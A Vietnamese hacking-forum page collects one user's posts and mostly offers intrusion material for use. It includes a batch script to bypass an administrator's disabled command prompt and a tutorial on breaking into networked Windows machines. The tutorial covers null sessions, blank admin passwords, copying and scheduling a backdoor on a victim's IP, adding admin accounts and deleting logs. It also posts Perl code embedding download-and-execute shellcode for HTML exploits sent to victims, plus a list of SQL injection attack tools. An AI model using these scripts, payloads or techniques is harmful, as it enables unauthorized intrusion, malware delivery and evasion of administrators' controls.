banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: holiganvn  XML
Profile for holiganvn Messages posted by holiganvn [ number of posts not being displayed on this page: 0 ]
 
có thể bạn chạy nhiều ứng dụng cùng 1 lúc qua khiến YM bị treo,bạn vào start>run>msconfig>Startup,tắt bớt các ừng dụng không cần thiết rồi khởi động lại máy

newbieProIT wrote:
Theo như em tìm hiểu thì hai ngôn ngữ này có nhiều điểm chung. Tuy nhiên perl thì chỉ mạnh trong những chương trình nhỏ dạng như shell script. Còn python thì có thể dùng để viết những chương trình lớn.
Dĩ nhiên là biết 2 ngôn ngữ này thì quá tốt. Nhưng theo các anh nên học cái nào trước thì tốt hơn? Và cái em phân vân là nếu xét từ góc độ công việc của một Admin thì ngôn ngữ nào cần hơn.
Câu hỏi của newbie, mong các anh chị đừng cười em smilie 


nên học perl trước đi bạn,perl dễ học và hay hơn python nhiều
các bạn có thể dùng đoạn mã sau để open cmd mỗi khi bị admin khóa:

Code:
@echo off
rem /*** You can read this script on pastebin : http://pastebin.com/f39ad7d24 ***/
rem /*** BYPASS CMD.EXE RESTRICTION ***/
rem /*** By: TR@PC0D13N ***/
rem /*** By: TR@PC0D13N ***/
rem /*** By: TR@PC0D13N ***/
rem /*** By: TR@PC0D13N ***/
rem /*** By: TR@PC0D13N ***/
rem /*** By: TR@PC0D13N ***/
rem /*** Contact: <a href="mailto:trapcodien@hotmail.fr">trapcodien@hotmail.fr</a> ***/
rem /*** Platform: All Windows Versions ***/
rem /***
rem Description: This batch scripting file can bypass
rem the cmd.exe restriction ( when the prompt command
rem say : "The command prompt has been disabled by your administrator" )
rem ***/
set chdir=chdir
color f0
title Bypass CMD Restriction By TR@PC0D13N
:top
set command=rem
%chdir%
set /p command=Command:
%command%
echo.
echo.
echo.
goto top


save lại với đuôi file là .bat rồi chạy

khanhth wrote:
anh oi em quên download phan unistall của phan mem IDM vay làm sao đê xóa no dược
 


bạn tải IDM về rồi cài đè lên cái thư mục bạn đã cài IDM,rồi dùng total unistall để xóa nó

telomcom wrote:
Để kiểm nghiệm thực tế tôi tự thiết lập mạng LAN với 03 máy.
Tất cả đều cài giống nhau: Windows XP, AVG Anti-Virus Free
Vậy xin hỏi các bạn từ một máy tôi có thể vào 02 máy còn lại khi biết được:
IP, USER, PASS(để cho thật dễ tôi không đặt mật khẩu), ....
 


bạn thử tìm hiểu các câu lệnh này coi:

Code:
Lệnh NET
Ở đây trong phạm vi bài viết tôi chỉ giới thiệu vài cú pháp của từng lệnh một cách ngắn gọn và thực tiển, còn bạn muốn tìm hiểu sâu hơn chỉ việc gõ ==> “tên lệnh cần tìm hiểu” /help (vd: để biết sâu về lệnh net view bạn gõ ==> net view /help), và tôi cũng không đi sâu về công việc thâm nhập. Bài viết này giống như là một bài tổng hợp các lệnh cần thiết mà thôi vì đôi khi nếu lâu ngày không sử dụng đến thì bạn vẫn có thể quên nó như thường.
Chương I: Lệnh NET
Lệnh NET là một lệnh ngoại trú (tức là không có sẵn) nhưng nó luôn được đi kèm với hầu hết các hệ điều hành Windows của Microsoft và nó là một lệnh rất cần thiết và quan trọng dùng để xâm nhập một hệ thống lệnh NET không đi một mình mà nó đi chung với những phương thức khác để kết hợp thành một tổ hợp cụ thể. Chính vì tầm quan trọng của nó nên tôi tách hẳn nó ra thành một chương riêng biệt
1/ NET VIEW: Lệnh này dùng để xem danh sách các tài nguyên đang được chia sẽ của một máy bất kỳ nếu không có bất cứ tham số nào có nghĩa là nó sẽ hiển thị tài nguyên của máy cục bộ (local)
Cú pháp:
NET VIEW \\computername
or
NET VIEW \\ip
(dùng cho máy trên mạng hoặc tên hoặc địa chỉ IP)
Ví dụ:
NET VIEW \\127.0.0.1
2/ NET USE: Lệnh này dùng để kết nối máy của người đang thực hiện tới một tài nguyên được chia sẻ trên hệ thống mạng (có thể hiểu hệ thống mạng ở đây có thể là các máy tính trong mạng cục bộ hoặc qua địa chỉ IP cố định) với một quyền hạn nhất định. Lưu ý ở đây là lệnh này chỉ có tác dụng khi bạn có quyền hạn người sử dụng nhất định trên một tài nguyên nhất định trên mỗi máy cần truy cập mà thôi (đó là trường hợp bạn biết được username và password trên máy muốn kết nối tài nguyên còn trường hợp như bạn không biết được thì có một cách là kết nối một null session đến máy cần kết nối) cũng có một cách khác là đoán và “bruce force password” hoặc sử dụng tools nhưng trong phạm vi bài viết này tôi không đề cập đến.
Cú pháp:
NET USE \\IP\SHARENAME “PASSWORD” /USER:”USERNAME”
(Dùng kết nối tới một tài nguyên nhất định khi biết username và password)
NET USE \\IP\IPC$ “” /USER:”Administrator”
(trường hợp password của Admin không thiết lập)
NET USE \\IP\IPC$
(kết nối một null session tới tài nguyên mặt định ==> xác xuất thành công rất thấp)
NET USE ….. /DELETE
(sẽ ngắt kết nối từ máy người sử dụng tới máy chứa tài nguyên)
Ví dụ: như bạn đang ở máy A bạn muốn kết nối tài nguyên của máy B có địa chỉ IP là 120.1.1.5 trong khi đó máy B có 2 tài nguyên được chia sẽ là (data1 và data2 và data1 dành cho “user1″ với password là “pass1″ và “data2″ dành cho user2 với password là “pass2″ còn một trường hợp nữa là tài nguyên mặt định của máy B là IPC$ và thường là dành cho quyền cao nhất là admin và nếu không may tài khoản administrator không có password bảo vệ thì coi như khi bạn kết nối tới tài nguyên IPC$ thì bạn hoàn toàn có thể truy cập vào mọi tài nguyên được chia sẽ mặt định và không mặt định trên máy B)
-Để kết nối tới data1 và gán tài nguyên đó cho ổ đĩa x: ==> NET USE x: \\120.1.1.5\data1 “pass1″ /USER:”user1″
-Để kết nối tới tài nguyên mặt định trong trường hợp admin không thiết lập password:
Bước 1 ==> NET USE \\120.1.1.5\IPC$ “” /USER:”administrator” (khi kết nối này thành công thì mới thực hiện tiếp)
Bước 1′ ==> NET USE \\120.1.1.5\IPC$ (kết nối tới một null session)
Bước 2 ==> NET USE z: \\120.1.1.5\data2 (gán data2 cho ổ đĩa z: để truy :cập để tiện sử dụng, bạn nên lưu ý ở đây tôi không cần phải thêm password và username như ví dụ trước vì đã kết nối tới IPC$ thành công thì không cần)
Bước 2′ ==> NET USE y: \\120.1.1.5\C$ (truy cập tới ổ đĩa c: của victim thường là chia sẽ mặt định và gán cho ổ y: máy local từ đó bạn có thể copy bất cứ thứ gì bạn muốn vào máy victim)
Ghi chú: Nếu như kết nối tại bước 1 hay bước 1′ thành công thì bạn có thể thao tác các câu lệnh khác trên máy victim mà không gặp bất cứ khó khăn gì vì đó chính là chìa khóa của cánh cửa. Nếu sử dụng lệnh NET USE thành công thì coi như bạn đã nắm trong tay bất cứ máy nào.
3/ NET USER: Tạo/Xóa tài khoản người dùng (có thể tra cứu thêm bằng /HELP), hoặc hiện danh sách tài khoản nếu không có tham số.
Cú pháp:
NET USER “username” “password” /ADD
(tạo người dùng có tên là username và password)
NET USER “username” /DELETE
(xóa người dùng có tên là username)
Ví dụ:
NET USER L0ng3ta passw /ADD
(thêm một user có tên là “L0ng3ta” và mật khẩu là “passw” vào hệ thống không nhất thiết phải có dâu “” trừ những trường hợp có ký tự đặc biệt)
NET USER L0ng3ta /DELETE
(xóa người dùng có tên là “L0ng3ta”)
4/ NET GROUP: Thêm/Xóa người dùng ở một group, hiển thị các group (nếu không có tham số)
Cú pháp:
NET GROUP “groupname” “username” /ADD
(thêm người dùng có tên username vào group có tên groupname)
NET LOCALGROUP “groupname” “username” /ADD
(thêm người dùng có tên username vào localgroup có tên groupname)
NET GROUP “groupname” “username” /DELETE
(thêm người dùng có tên username vào group có tên groupname)
NET LOCALGROUP “groupname” “username” /DELETE
(xóa người dùng có tên username khỏi localgroup có tên groupname)
Ví dụ:
NET GROUP “Administrators” “L0ng3ta” /ADD
(Thêm user L0ng3ta vào group admin)
5/ NET START/STOP “tên dịch vụ”: lệnh này dùng để khởi tạo hoặc tắt một dịch vụ (Service) của hệ thống window (thường sử dụng trên local)
ví dụ:
NET START|STOP “Task Scheduler” (khởi động/tắt dịch vụ Task Scheduler của hệ thống xem thêm lệnh SC)
6/ NET TIME: xem giờ của máy trên hệ thống mạng
Cú pháp:
NET TIME \\IP
(xem giờ của máy có địa chỉ IP xác định)
ví dụ:
NET TIME \\120.1.1.5
7/ NET SHARE: dùng để chia sẽ tài nguyên (thường dùng trên local)
Cú pháp:
NET SHARE sharename=path
(path ở đây có thể là một ổ đĩa hoặc đường dẫn tuyệt đối tới một thư mục hoặc máy in .v.v.)
ví dụ:
NET SHARE DATA=C:\ /UNLIMITED
(Chia sẽ ổ đĩa c: lấy tên là ổ data với quyền truy cập không giới hạn)



Code:
Phần II: Các lệnh cơ bản khác
NẾU BẠN MUỐN COPY BÀI VIẾT XIN VUI LÒNG TÔN TRỌNG QUYỀN TÁC GIẢ
Đâu phải lúc nào bạn cũng dễ dàng thực hiện các thao tác thông giao diện bằng graphic trên máy cần thao tác (ví dụ như những khi bạn đang làm chuyện mờ ám thì làm gì có cái Window Explorer chằng hạn để cho bạn sử dụng và thao tác trên các tập tin) vì thế những lệnh sau tuy đơn giản nhưng cũng khá là quang trọng trong thao tác của bạn, nếu như bạn muốn thâm nhập một máy nào đó chẳng hạn mà bạn coi như không thuộc nằm lòng các lệnh dưới đây thì tôi khuyên bạn hãy bỏ ý định đó đi.
1/Lệnh COPY: lệnh này là lệnh nội trú dùng để sao chép các tập tin (khi bạn xâm nhập vào được rồi thì dĩ nhiên phải để lại cái gì đó thì bạn dùng lệnh này)
Cú pháp:
COPY path1\filename1 path2
(chép tập tin filename1 ở đường dẫn path1 sang đường dẫn path2)
+Chú ý: ở đây tôi dùng định nghĩa đường dẫn tức là có thể gồm một ổ đĩa, một thư mục hay cả một địa chỉ tài nguyên mạng (với điều kiện bạn đã kết nối tới)
Ví dụ:
==>COPY c:\abc.txt d:\
(chép tập tin có tên là abc.txt từ ổ c: sang ổ đĩa d
==>COPY c:\backdoor.exe \\203.162.45.2\c$
(chép file backdoor từ ổ đĩa C máy của bạn sang ổ đĩa C của địa chỉ IP 203.162.45.2)
Lưu ý: tên tập tin bạn có thể sử dụng những ký tự đại diện như * hoặc ?
==>Copy c:\*.doc d:\ (chép tất cả các tệp có đuôi .doc sang ổ d
2/Lệnh DEL: lệnh này là lệnh nội trú dùng để xóa tập tin (dùng để xóa bỏ dấu chân người lính file:///e:/Thien/FirefoxPortable/Data/profile/ScrapBook/data/20080927151511/icon_wink.gif )
Cú pháp:
DEL path\filename
(xóa file có tên là filename ở tại đường dẫn path)
Ví dụ:
==>DEL c:\windows\*.log
(xóa tất cả tệp tin .log tại ổ đĩa C: và trong thư mục windows)
Mở rộng: DEL \\203.162.45.2\Admin$\*.log
3/Lệnh MD: lệnh này là lệnh nội trú dùng để tạo một thư mục
Cú pháp:
MD path\tenthumuc
Ví dụ:
==>MD c:\windows\temp1
(tạo thư mục temp1 trong thư mục windows của ổ c
Mở rộng:
==>MD \\203.162.45.2\Admin$\temp1
4/Lệnh RD hay RMDIR (xóa thư mục)
Cú pháp:
RD /S /Q path\tenthumuc
(với tham số /S thì sẽ xóa tất cả các file và thư mục con nằm trong thư mục cần xóa và tham số /Q là xóa không cần hỏi)
Ví dụ:
==>RD /S /Q c:\windows\system32
(xóa thư mục system32 và tất cả những gì nằm trong system32)
5/Lệnh AT: hẹn giờ cho một chương trình tự kích hoạt (có thể gõ AT /HELP để biết thêm)
Cú pháp:
AT \\IP time /INTERACTIVE “command”
Ví dụ:
==>AT \\203.162.45.2 2:30AM /INTERACTIVE “c:\backdoor.exe”
Hẹn giờ đúng 2:30 thì máy có địa chỉ IP là \\203.162.45.2 sẽ kích hoạt chương trình backdoor.exe trong ổ C:
Lưu ý: lệnh AT chỉ có tác dụng khi service task schedule đã được bật lên. (xem thêm lệnh NET START (trong phần 1) hoặc lệnh SC bên dưới để biết cách bật một service) và muốn chương trình kích hoạt ngay mà không phải đợi thì bạn phải kiểm tra giờ hệ thống tại địa chỉ IP xác định bằng lệnh NET TIME (trong phần 1) và bảo đảm rằng giờ bạn hẹn cho chương trình kích hoạt phải lớn hơn giờ hệ thống ít nhất là 1 phút.
6/Lệnh SC: chạy hoặt tắt một service trên máy xác định
Cú pháp:
SC \\IP start/stop/pause… service
Ví dụ:
==>SC \\203.162.45.2 start Schedule
(chạy service Schedule trên máy có IP 203.162.45.2)
7/Lệnh START: kích hoạt một chương trình tại máy local
Cú pháp:
START “tên chương trình”
Ví dụ: (chạy chương trình notepad từ command line)
==>START notepad
hoặc
==>START notepad.exe
8/Lệnh TASKlist (xem danh sách và ID các chương trình chạy trong process).
Để tìm hiểu thêm bằng cách gõ TASKlist /?
9/Lệnh TASKKILL (hủy một process xem thêm bằng cách TASKKILL /?)
Cú pháp:
TASKKILL /PID ID
(hủy chương trình đang chạy theo ID)
hoặc
TASKKILL /F /IM “tên chương trình”
(hủy chương trình có tên đang chạy trong process)
Ví dụ chương trình notepad.exe khi chạy lệnh TASKlist có ID là 644 thì khi muốn hủy ta gõ lệnh:
==>TASKKILL /PID 644
hoặc
==>TASKKILL /F /IM notepad.exe
10/Lệnh REG: (tạo, xóa, khôi phục, xem… các giá trị của registry trên máy local hoặc mát mạng)
Cú pháp:
Reg Operation
Trong đó Operation bao gồm các thao tác như Add, Query, Delete, Copy, Save, Load, Unload, Restore, …. để biết thêm chi tiết các bạn gõ Reg Add /?)
Ví dụ: mở khóa cho registry edit cho máy tính có tên là ABC bạn bạn gõ như sau:
REG add \\ABC\HKCU\Software\Microsoft\Windows\CurrentVersi on\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f


Đó là những lệnh hết sức cơ bản mà các bạn cần phải nắm rõ nếu như muốn đi bước đầu về lĩnh vực thâm nhập. Nhưng các lệnh này không phải là tất cả vì còn nhiều nhiều lệnh và chương trình khác nữa nhưng đó là những lệnh thiết yếu nhất. Chẳng qua bài viết này chỉ nhằm mục đích thống kê vì đôi khi lâu ngày ta không sử dụng đến rồi cũng quên. Hy vọng bài viết giúp ích cho các bạn và giúp các bạn cũng cố một lại số kiến thức cơ bản.

nguồn:internet

ngoài ra chúng ta có thể sử dụng Metasploit để thâm nhập

download metasploit portable:

http://www.4shared.com/file/97156264/ff761328/Metasploit_32_Portable_10.html

bạn có thể đọc thêm tài liệu ở đây:

/hvaonline/posts/list/30311.html

constructor_87 wrote:
thanks!  


nhưng mình khuyên bạn nên sử dụng ubuntu,vì ubuntu được cộng đồng linux việt nam sử dụng đông đảo,tập làm quen với ubuntu rồi sau đó mới qua sử dụng mấy cái kia
Wireshark 1.2.1 Released


Wireshark 1.2.1 has been released. Installers for Windows, Mac OS X 10.5.5 and above (Intel and PPC), and source code is now available.

Wireshark is the world's most popular network protocol analyzer. It is used for troubleshooting, analysis, development, and education.

The following vulnerabilities have been fixed. See the security advisory for details and a workaround.



download:

http://www.wireshark.org/
ebook hướng dẫn cho các bạn những bước cơ bản phân tích 1 Malware,chú ý:

Code:
-Always use a real computer not a virtual machine like they said in several paper it will prevent anti-virtual machine code.
-Freeze windows partition with software like deep freeze or returnil (I prefer returnil but it's my choice)
-Make a second partition for your documents and settings and your tools ( search on google on how to move documents and settings)
-Use monitoring tool to check what file do and reversing tool to analyse part of the file


download:

http://www.zshare.net/download/62949037a7ec76c9/

có thể đọc thêm các tut ở đây:

Code:
http://www.windowsecurity.com/articles/Reverse-Engineering-Malware-Part1.html
 http://www.securityfocus.com/infocus/1780

constructor_87 wrote:
thanks bác! tiện đây có bác nào có thể liệt kê các phương pháp thâm nhập 1 website kèm theo kiến thức cần có của mỗi phương pháp đó ko? Như vậy mình có thể dựa vào các kiến thức kèm theo để chọn ra 1 phương pháp thâm nhập "tủ" cho bản thân. chứ để có khả năng sử dụng hết các pp đó thì e ra ...
cám ơn nhiều! 


về phương diện kĩ thuật:trước hết bác phải hiểu website là gì,cách tạo ra nó,các thuật ngữ đi kèm với nó,vd như website tĩnh,website động,tên miền,host....Nhưng quan trọng nhất khi muốn thâm nhập 1 website nào đó ít nhất bác phải biết website đó được "viết bởi" ngôn ngữ lập trình web gì(asp,php,java,html),tìm hiểu điểm yếu của các ngôn ngữ lập trình đó,từ đó "lợi dụng" các lỗi đó để thâm nhập

---SQL Injection: kỹ thuật chèn thêm lệnh vào câu truy vấn để tấn công hệ thống cơ sở dữ liệu.,thích hợp cho những người nào thông thạo về SQL và hệ thông cơ sở dữ liệu,đặc biệt phương pháp này cần chút kiên trì khi truy vẫn cơ sở dữ liệu

---Cross Site Scripting(XSS): kỹ thuật chèn thêm mã javascript hoặc vbscript vào trang website để đánh cắp thông tin cá nhân của người sử dụng,thường dùng để Phishing hoặc để social engineering,cần thông thạo javascript hoặc vbscript,các trang web chuyên giới thiệu về lỗi này:

Code:
http://www.xssed.com
 http://www.xssing.com


---Session Hijacking: kỹ thuật đánh cắp phiên làm việc để chiếm quyền điều khiển tài khoản của người sử dụng.

Code:
http://en.wikipedia.org/wiki/Session_hijacking


---File Inclusion Attacks:cần biết về Lập trình PHP,Cơ bản về Apache,Cơ bản về Linux ,Về cơ bản có hai kiểu khai thác là inclde file từ máy chủ khác (RFI – Remote file include), include file từ chính máy chủ lỗi (LFI – Local file include).Mục đích của kẻ tấn công là chạy được các hàm hệ thống và thu thập các thông tin nhạy cảm của hệ thống. Tất cả công việc trên kẻ tấn công có thể đạt được khi chạy được web shell (hay còn gọi là web hack tool) như c99shell, r57shell, …,lỗi này được tấn dụng để tấn công "local hack",kiểu tấn công rất phổ biến của các "script kiddies" việt nam smilie

---nếu bác là 1 ngườii biết cách lừa đảo thì hay nhất vẫn là social engineering,ở việt nam có huyremy và thế giới là kevin mitnick ,2 người tuy không giỏi lắm về IT,nhưng nhờ sử dụng khá tốt phương pháp social engineering,nên họ đã trở nên "rất nổi tiếng"

và còn rất nhiều phương pháp khác nữa...,vd:dùng tr0jan,virus để thu thập user name và password của người quản trị

constructor_87 wrote:
search trên google thì mình cũng đã phần nào nắm đc các con đường thâm nhập website phổ biến. tuy nhiên trong những con đường đó thì con đường nào là khả thi nhất (khó đề phòng nhất ngoại trừ ddos) ? 


về phương diện kĩ thuật,có 2 cách thâm nhập web đang khá phổ biến

SQL và XSS smilie

nhưng khó đề phòng nhất là yếu tố con người(social engineering)

constructor_87 wrote:
với mục đích thâm nhậm mình cần tìm hiểu về Linux nhưng có quá nhiều phiên bản của nó mà mình chưa xác định đc nên tìm hiểu cái nào? (mà tìm hiểu mức cần thiết ở đây sử dụng đc hay phải hiểu cả mã nguồn?) mình đọc bài đối thoại của rookie thì thấy redhat có vẻ đc đánh giá cao nhưng hình như hiện nay redhat có vẻ "im tiếng" (ko nói fedora nha ^^) 


b4Ck-trAck 4 hoặc WeakNet Linux ,đây là 2 phiên bản hệ điều hành linux thích hợp nhất dánh cho những ai muốn thâm nhập

link:

/hvaonline/posts/list/13905.html
các bạn sử dụng đoạn mã perl sau để transltae sang javascript(vẫn sử dụng exploits HTML):


# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode

Code:
#!/usr/bin/perl
use strict;
# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode
# coded by elazer (elazarb [at] earthlink.net)
# linux Usage:
# bt shellcode # ./jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211
# windows Usage:
# C:\Documents and Settings\elazer\Desktop>jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211
# your shellcode here
my $shellcode =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdf".
"\xfa\xe2\x72\x83\xeb\xfc\xe2\xf4\x23\x90\x09\x3f\x37\x03\x1d\x8d".
"\x20\x9a\x69\x1e\xfb\xde\x69\x37\xe3\x71\x9e\x77\xa7\xfb\x0d\xf9".
"\x90\xe2\x69\x2d\xff\xfb\x09\x3b\x54\xce\x69\x73\x31\xcb\x22\xeb".
"\x73\x7e\x22\x06\xd8\x3b\x28\x7f\xde\x38\x09\x86\xe4\xae\xc6\x5a".
"\xaa\x1f\x69\x2d\xfb\xfb\x09\x14\x54\xf6\xa9\xf9\x80\xe6\xe3\x99".
"\xdc\xd6\x69\xfb\xb3\xde\xfe\x13\x1c\xcb\x39\x16\x54\xb9\xd2\xf9".
"\x9f\xf6\x69\x02\xc3\x57\x69\x32\xd7\xa4\x8a\xfc\x91\xf4\x0e\x22".
"\x20\x2c\x84\x21\xb9\x92\xd1\x40\xb7\x8d\x91\x40\x80\xae\x1d\xa2".
"\xb7\x31\x0f\x8e\xe4\xaa\x1d\xa4\x80\x73\x07\x14\x5e\x17\xea\x70".
"\x8a\x90\xe0\x8d\x0f\x92\x3b\x7b\x2a\x57\xb5\x8d\x09\xa9\xb1\x21".
"\x8c\xb9\xb1\x31\x8c\x05\x32\x1a\x1f\x52\xe0\x17\xb9\x92\xea\x3b".
"\xb9\xa9\x6b\x93\x4a\x92\x0e\x8b\x75\x9a\xb5\x8d\x09\x90\xf2\x23".
"\x8a\x05\x32\x14\xb5\x9e\x84\x1a\xbc\x97\x88\x22\x86\xd3\x2e\xfb".
"\x38\x90\xa6\xfb\x3d\xcb\x22\x81\x75\x6f\x6b\x8f\x21\xb8\xcf\x8c".
"\x9d\xd6\x6f\x08\xe7\x51\x49\xd9\xb7\x88\x1c\xc1\xc9\x05\x97\x5a".
"\x20\x2c\xb9\x25\x8d\xab\xb3\x23\xb5\xfb\xb3\x23\x8a\xab\x1d\xa2".
"\xb7\x57\x3b\x77\x11\xa9\x1d\xa4\xb5\x05\x1d\x45\x20\x2a\x8a\x95".
"\xa6\x3c\x9b\x8d\xaa\xfe\x1d\xa4\x20\x8d\x1e\x8d\x0f\x92\x12\xf8".
"\xdb\xa5\xb1\x8d\x09\x05\x32\x72";
my $jscript =convert_shellcode($shellcode);
buffer_gen($shellcode);
print $jscript;
sub generate_char()
{
my $wdsize = shift;
my @alphanumeric = ('a'..'z');
my $wd = join '',
map $alphanumeric[rand @alphanumeric], 0..$wdsize;
return $wd;
}
sub convert_shellcode {
my $data = shift;
my $mode = shift() || 'LE';
my $code = '';
my $idx = 0;
if (length($data) % 2 != 0) {
$data .= substr($data, -1, 1);
}
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
if ($mode eq 'LE') {
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
} else {
$code .= sprintf('%%u%.2x%.2x', $c1, $c2);
}
$idx += 2;
}
return $code;
}
sub buffer_gen(){
}


sau đó changing shellcode, upload file .html lên host,rồi send cho victim
SQL Power Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.

Code:
http://www.sqlpowerinjector.com/


FJ-Injector Framwork - FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a ***** feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.

Code:
http://sourceforge.net/projects/injection-fwk/files/


SQLNinja - SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja.

Code:
http://sqlninja.sourceforge.net/


Automagic SQL Injector - The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. Get Automagic SQL Injector.

Code:
http://www.indianz.ch/tools/attack/automagic.zip


NGSS SQL Injector - NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.

Code:
http://www.indianz.ch/tools/attack/sqlinjector.zip


SQLIer - SQLIer takes a vulnerable url and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.

Code:
http://bcable.net/project.php?sqlier


SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.

Code:
http://www.reversing.org/node/view/11


SQL Injection Brute-forcer - SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.

Code:
http://www.open-labs.org/sqlibf19beta1.tar.gz


SQLBrute - SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.

Code:
http://www.justinclarke.com/security/sqlbrute.py


download ActivePerl dành cho win:

http://aspn.activestate.com/ASPN/Downloads/ActivePerl/

BobCat - BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.

Code:
http://www.northern-monkee.co.uk/pub/bobcat.html


SQLMap - SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.

Code:
http://sqlmap.sourceforge.net/


Absinthe - Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.

Code:
http://www.0x90.org/releases/absinthe/download.php


SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.

Code:
http://sqltool.itdefence.ru/indexeng.html


SQID - SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.

Code:
http://sqid.rubyforge.org/


Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.

Code:
http://www.unsec.net/download/bsqlbf.pl


đây là 1 giải pháp cho phép bạn KHÓA bất cứ thư mục nào ,chỉ cần sử dụng 1 đoạn mã nhỏ như sau:

Code:
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
